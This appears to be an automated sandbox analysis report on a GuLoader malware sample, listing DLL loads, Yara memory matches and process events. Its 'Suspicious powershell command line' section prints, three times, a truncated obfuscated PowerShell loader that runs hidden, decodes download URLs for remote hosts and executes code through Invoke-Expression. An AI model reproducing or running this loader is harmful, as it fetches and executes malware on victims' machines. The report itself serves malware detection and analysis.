Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Data Obfuscation

Yara detected GuLoader

Source: Yara match	File source: 0000000B.00000002.2462762606.000000000E361000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1300165087.000002D446AB3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2462628571.0000000009B40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2438738602.0000000005C84000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Suspicious powershell command line found

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden ";$Pukka='Drillevorn';;$Additionstegnenes='Drftede165';;$Neri='Thebain';;$Asteroidens='Outsling';;$Daarskab='Calamopitys';;$gastons=$host.Name;function Galskaber65($Paretically){If ($gastons) {$Chemiuserzation191=5} for ($Thinkings=$Chemiuserzation191;;$Thinkings+=6){if(!$Paretically[$Thinkings]) { break }$Kondenseringerne+=$Paretically[$Thinkings]}$Kondenseringerne}function bearbejdeligste($Fagidioternes){ .($Medunderskriv) ($Fagidioternes)}$Succinctory46=Galskaber65 'RestinMediteIngm.tM.tho. Drifwelskoe hjembTelefCirreclbowleiLasereAncylnSaurut';$hjulpiskere=Galskaber65 'Inde,M Gardo s adzEkspriStrumlStr.plSliksaStrel/';$Wiggas=Galskaber65 'ElbilT,ontrlRygdksTrlso1Arn s2';$husholderisk='Egne [InvirNSu plE Pr gTTeg o.HjspnSBirdleSkg,rRTilgivDiapaI GawgCFor iEGrshoPFr boO iarii Fo onlang tUdsyrmLivsfaChartNBajonaPo.ygginoffeDo.inrElekt]Hydr :Udnyt: TidsSSk riev nfuCCnemiU K ncrUni.ei.uesttAutopySkrifpSge rr sphaO esudtOmskiOkonstcShrieoUnspelRe da= Arme$UdpumwstrewI A.ndGTeknoGStal aBu.keS';$hjulpiskere+=Galskaber65 'S bar5Forpl.Ligus0Rhapo Ganga( kultW Unw iVinstngnetadRebutoPectowM zzlsMarke H,emmNEkspoT ysse mana1Cerva0H eml.Overc0Aftwa;Pre t FrivoWtrussi Pl mn acif6 Ni h4Digre; Pela AvocaxL ftn6 Sa.o4Mesot;Blaat F gtnr D,sqv .ont:Trolo1Monoc3Revei1 sp c. Or m0Hyper) Jaev ReverGV ndierappocFunktkGrutno Rest/ Marc2dowha0Bivaa1Fod n0Pili.0Tivol1Redif0 Berb1Hypos Pa aF E,oti ultrGenite ForsfValuto Injux red/ Util1Krkli3 Frey1Sa.di.Afgr 0';$Vampirish=Galskaber65 ' PsycU BlacsTegneENatteR op.a-MisemaF lklGSkrmbePharyNRodenT';$Stokken=Galskaber65 'Elekth SandtNef,nt Subvp DigisHaema:Holda/ orbi/ kovsc AnsvoUsk.dhUnbuyaTiff bHype iMessatM onlaBefaliResepsanden.SilkerHaveeuKolle.Stttec UntioSiphomTecto/H ghvc,orsts HvedsSchin- ekos/degerOMerckvServeeBanker Forls lfooP eseeHovediFaeposBe.rakEc.oceMaled.Preo aUdskrskvabad Si s>DrifthOrkant Wh mtMalispNonalsImams:Frem /Met i/IndvenUsel rTegnk.FitchyRestiy Stran ulkodCaprizg oseq Pa e2 Mulc. Nonis Stuba Thed. iskcChuckoTot mmMicro/Pictuc ColugBetweiSolid_Dili,bCa diinoninnVrd.h/Lnk rOPs,udvNarc eNoni r NdrisBankfoF.rreeNonrhiU stys Lea kVideoe Unge. nisaa matrs Uns d';$Dogwinkle=Galskaber65 'Bivua>';$Medunderskriv=Galskaber65 'udskrIPlie,e,iskeX';$Overspille='secco';$Blossoms='\Suspendibility.Lum';bearbejdeligste (Galskaber65 'Sojas$MisguGAl mnl DetaOMet lBFlsenaBrierl,ugnl: Empod dskiO hegugRustnMStopkaPsychtStr kIFil iSProceMIs ndEAnathrJazzb= Rdle$AroineUpheanRevelV,tjer:CreneAForhapTristP lossDfiletAsuperTForseaForbr+Bidra$BjergbGoy,mlUnreqoSkomaSTrediSDe,mnoFlowcmVellas');bearbejdeligste (Galskaber65 'Un.lo$UnbrigClausLInforOPapirbMas.iAUn erLModfa:Tiaaro C rymRapshf,nkilAP pulNHyletgGlosaSbrunibRhkluEB,rgedFlammmAccruM .inieAnkyll GarrsForbiE NandNA,tob=Latti$OptigSStjmatKejseOBushrK nathKRes tEAflasN Spal.S uttS UntwpSig elDe,enIGlisttIconi(Grop,$Lyn hD De.roUds jG.fsenWFa rdiKj.rsNAmtsvKBruttL a ahe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden ";$Pukka='Drillevorn';;$Additionstegnenes='Drftede165';;$Neri='Thebain';;$Asteroidens='Outsling';;$Daarskab='Calamopitys';;$gastons=$host.Name;function Galskaber65($Paretically){If ($gastons) {$Chemiuserzation191=5} for ($Thinkings=$Chemiuserzation191;;$Thinkings+=6){if(!$Paretically[$Thinkings]) { break }$Kondenseringerne+=$Paretically[$Thinkings]}$Kondenseringerne}function bearbejdeligste($Fagidioternes){ .($Medunderskriv) ($Fagidioternes)}$Succinctory46=Galskaber65 'RestinMediteIngm.tM.tho. Drifwelskoe hjembTelefCirreclbowleiLasereAncylnSaurut';$hjulpiskere=Galskaber65 'Inde,M Gardo s adzEkspriStrumlStr.plSliksaStrel/';$Wiggas=Galskaber65 'ElbilT,ontrlRygdksTrlso1Arn s2';$husholderisk='Egne [InvirNSu plE Pr gTTeg o.HjspnSBirdleSkg,rRTilgivDiapaI GawgCFor iEGrshoPFr boO iarii Fo onlang tUdsyrmLivsfaChartNBajonaPo.ygginoffeDo.inrElekt]Hydr :Udnyt: TidsSSk riev nfuCCnemiU K ncrUni.ei.uesttAutopySkrifpSge rr sphaO esudtOmskiOkonstcShrieoUnspelRe da= Arme$UdpumwstrewI A.ndGTeknoGStal aBu.keS';$hjulpiskere+=Galskaber65 'S bar5Forpl.Ligus0Rhapo Ganga( kultW Unw iVinstngnetadRebutoPectowM zzlsMarke H,emmNEkspoT ysse mana1Cerva0H eml.Overc0Aftwa;Pre t FrivoWtrussi Pl mn acif6 Ni h4Digre; Pela AvocaxL ftn6 Sa.o4Mesot;Blaat F gtnr D,sqv .ont:Trolo1Monoc3Revei1 sp c. Or m0Hyper) Jaev ReverGV ndierappocFunktkGrutno Rest/ Marc2dowha0Bivaa1Fod n0Pili.0Tivol1Redif0 Berb1Hypos Pa aF E,oti ultrGenite ForsfValuto Injux red/ Util1Krkli3 Frey1Sa.di.Afgr 0';$Vampirish=Galskaber65 ' PsycU BlacsTegneENatteR op.a-MisemaF lklGSkrmbePharyNRodenT';$Stokken=Galskaber65 'Elekth SandtNef,nt Subvp DigisHaema:Holda/ orbi/ kovsc AnsvoUsk.dhUnbuyaTiff bHype iMessatM onlaBefaliResepsanden.SilkerHaveeuKolle.Stttec UntioSiphomTecto/H ghvc,orsts HvedsSchin- ekos/degerOMerckvServeeBanker Forls lfooP eseeHovediFaeposBe.rakEc.oceMaled.Preo aUdskrskvabad Si s>DrifthOrkant Wh mtMalispNonalsImams:Frem /Met i/IndvenUsel rTegnk.FitchyRestiy Stran ulkodCaprizg oseq Pa e2 Mulc. Nonis Stuba Thed. iskcChuckoTot mmMicro/Pictuc ColugBetweiSolid_Dili,bCa diinoninnVrd.h/Lnk rOPs,udvNarc eNoni r NdrisBankfoF.rreeNonrhiU stys Lea kVideoe Unge. nisaa matrs Uns d';$Dogwinkle=Galskaber65 'Bivua>';$Medunderskriv=Galskaber65 'udskrIPlie,e,iskeX';$Overspille='secco';$Blossoms='\Suspendibility.Lum';bearbejdeligste (Galskaber65 'Sojas$MisguGAl mnl DetaOMet lBFlsenaBrierl,ugnl: Empod dskiO hegugRustnMStopkaPsychtStr kIFil iSProceMIs ndEAnathrJazzb= Rdle$AroineUpheanRevelV,tjer:CreneAForhapTristP lossDfiletAsuperTForseaForbr+Bidra$BjergbGoy,mlUnreqoSkomaSTrediSDe,mnoFlowcmVellas');bearbejdeligste (Galskaber65 'Un.lo$UnbrigClausLInforOPapirbMas.iAUn erLModfa:Tiaaro C rymRapshf,nkilAP pulNHyletgGlosaSbrunibRhkluEB,rgedFlammmAccruM .inieAnkyll GarrsForbiE NandNA,tob=Latti$OptigSStjmatKejseOBushrK nathKRes tEAflasN Spal.S uttS UntwpSig elDe,enIGlisttIconi(Grop,$Lyn hD De.roUds jG.fsenWFa rdiKj.rsNAmtsvKBruttL a ahe
Source: unknown	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Pukka='Drillevorn';;$Additionstegnenes='Drftede165';;$Neri='Thebain';;$Asteroidens='Outsling';;$Daarskab='Calamopitys';;$gastons=$host.Name;function Galskaber65($Paretically){If ($gastons) {$Chemiuserzation191=5} for ($Thinkings=$Chemiuserzation191;;$Thinkings+=6){if(!$Paretically[$Thinkings]) { break }$Kondenseringerne+=$Paretically[$Thinkings]}$Kondenseringerne}function bearbejdeligste($Fagidioternes){ .($Medunderskriv) ($Fagidioternes)}$Succinctory46=Galskaber65 'RestinMediteIngm.tM.tho. Drifwelskoe hjembTelefCirreclbowleiLasereAncylnSaurut';$hjulpiskere=Galskaber65 'Inde,M Gardo s adzEkspriStrumlStr.plSliksaStrel/';$Wiggas=Galskaber65 'ElbilT,ontrlRygdksTrlso1Arn s2';$husholderisk='Egne [InvirNSu plE Pr gTTeg o.HjspnSBirdleSkg,rRTilgivDiapaI GawgCFor iEGrshoPFr boO iarii Fo onlang tUdsyrmLivsfaChartNBajonaPo.ygginoffeDo.inrElekt]Hydr :Udnyt: TidsSSk riev nfuCCnemiU K ncrUni.ei.uesttAutopySkrifpSge rr sphaO esudtOmskiOkonstcShrieoUnspelRe da= Arme$UdpumwstrewI A.ndGTeknoGStal aBu.keS';$hjulpiskere+=Galskaber65 'S bar5Forpl.Ligus0Rhapo Ganga( kultW Unw iVinstngnetadRebutoPectowM zzlsMarke H,emmNEkspoT ysse mana1Cerva0H eml.Overc0Aftwa;Pre t FrivoWtrussi Pl mn acif6 Ni h4Digre; Pela AvocaxL ftn6 Sa.o4Mesot;Blaat F gtnr D,sqv .ont:Trolo1Monoc3Revei1 sp c. Or m0Hyper) Jaev ReverGV ndierappocFunktkGrutno Rest/ Marc2dowha0Bivaa1Fod n0Pili.0Tivol1Redif0 Berb1Hypos Pa aF E,oti ultrGenite ForsfValuto Injux red/ Util1Krkli3 Frey1Sa.di.Afgr 0';$Vampirish=Galskaber65 ' PsycU BlacsTegneENatteR op.a-MisemaF lklGSkrmbePharyNRodenT';$Stokken=Galskaber65 'Elekth SandtNef,nt Subvp DigisHaema:Holda/ orbi/ kovsc AnsvoUsk.dhUnbuyaTiff bHype iMessatM onlaBefaliResepsanden.SilkerHaveeuKolle.Stttec UntioSiphomTecto/H ghvc,orsts HvedsSchin- ekos/degerOMerckvServeeBanker Forls lfooP eseeHovediFaeposBe.rakEc.oceMaled.Preo aUdskrskvabad Si s>DrifthOrkant Wh mtMalispNonalsImams:Frem /Met i/IndvenUsel rTegnk.FitchyRestiy Stran ulkodCaprizg oseq Pa e2 Mulc. Nonis Stuba Thed. iskcChuckoTot mmMicro/Pictuc ColugBetweiSolid_Dili,bCa diinoninnVrd.h/Lnk rOPs,udvNarc eNoni r NdrisBankfoF.rreeNonrhiU stys Lea kVideoe Unge. nisaa matrs Uns d';$Dogwinkle=Galskaber65 'Bivua>';$Medunderskriv=Galskaber65 'udskrIPlie,e,iskeX';$Overspille='secco';$Blossoms='\Suspendibility.Lum';bearbejdeligste (Galskaber65 'Sojas$MisguGAl mnl DetaOMet lBFlsenaBrierl,ugnl: Empod dskiO hegugRustnMStopkaPsychtStr kIFil iSProceMIs ndEAnathrJazzb= Rdle$AroineUpheanRevelV,tjer:CreneAForhapTristP lossDfiletAsuperTForseaForbr+Bidra$BjergbGoy,mlUnreqoSkomaSTrediSDe,mnoFlowcmVellas');bearbejdeligste (Galskaber65 'Un.lo$UnbrigClausLInforOPapirbMas.iAUn erLModfa:Tiaaro C rymRapshf,nkilAP pulNHyletgGlosaSbrunibRhkluEB,rgedFlammmAccruM .inieAnkyll GarrsForbiE NandNA,tob=Latti$OptigSStjmatKejseOBushrK nathKRes tEAflasN Spal.S uttS UntwpSig elDe,enIGlisttIconi(Grop,$Lyn hD De.roUds jG.fsenWFa rdi

Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
